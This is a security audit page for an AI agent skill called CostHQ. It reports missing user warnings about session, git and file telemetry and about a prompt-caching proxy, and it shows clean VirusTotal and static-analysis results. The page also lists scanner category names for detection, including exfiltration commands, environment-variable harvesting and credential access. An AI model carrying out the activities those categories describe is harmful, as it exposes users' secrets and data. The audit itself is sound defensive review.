Back to skill

Security audit

CostHQ

Security checks across malware telemetry and agentic risk

Overview

CostHQ appears purpose-aligned for cost tracking, but it asks agents to record session, file, git, and AI-traffic activity with under-specified privacy and retention controls.

Review before installing in sensitive repositories or regulated environments. Treat it as a telemetry and API-proxying tool: verify what the npm package records, where sync features send data, how to purge ~/.costhq, and whether the proxy caches prompts, responses, or credentials. Avoid enabling the proxy for secrets or confidential model traffic unless its cache isolation and retention behavior are clear.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Data ExfiltrationExternal Transmission, Env Variable Harvesting, File System Enumeration
  • Prompt InjectionInstruction Override, Hidden Instructions, Exfiltration Commands
  • Privilege EscalationExcessive Permissions, Sudo/Root Execution, Credential Access
  • Supply ChainUnpinned Dependencies, External Script Fetching, Obfuscated Code
  • Excessive AgencyUnrestricted Tool Access, Autonomous Decision Making, Scope Creep
Findings (3)

Missing User Warnings

Medium
Confidence
93% confidence
Finding
The skill prominently advertises tracking of file changes and git commits, but it does not clearly warn users that repository metadata and activity will be collected and stored. In an agent setting, this can expose sensitive filenames, commit metadata, branch history, or work patterns without informed user consent, especially when the agent is instructed to use the tool automatically.

Missing User Warnings

Medium
Confidence
95% confidence
Finding
The statement that the agent will 'automatically use it to track sessions' indicates default collection of session activity without a clear, adjacent warning about what is recorded and retained. Silent-by-default telemetry in an autonomous agent workflow can capture sensitive task descriptions, model usage, timestamps, and other operational metadata without meaningful user awareness.

Missing User Warnings

High
Confidence
98% confidence
Finding
The Semantic Caching Proxy is described as intercepting API calls and returning cached responses, but the instructions do not warn that prompts, responses, headers, or other sensitive request data may be captured, stored, and replayed. In practice, routing model traffic through a local proxy can materially change the trust boundary and create confidentiality, retention, and cross-session leakage risks.

VirusTotal

64/64 vendors flagged this skill as clean.

View on VirusTotal

Static analysis

No suspicious patterns detected.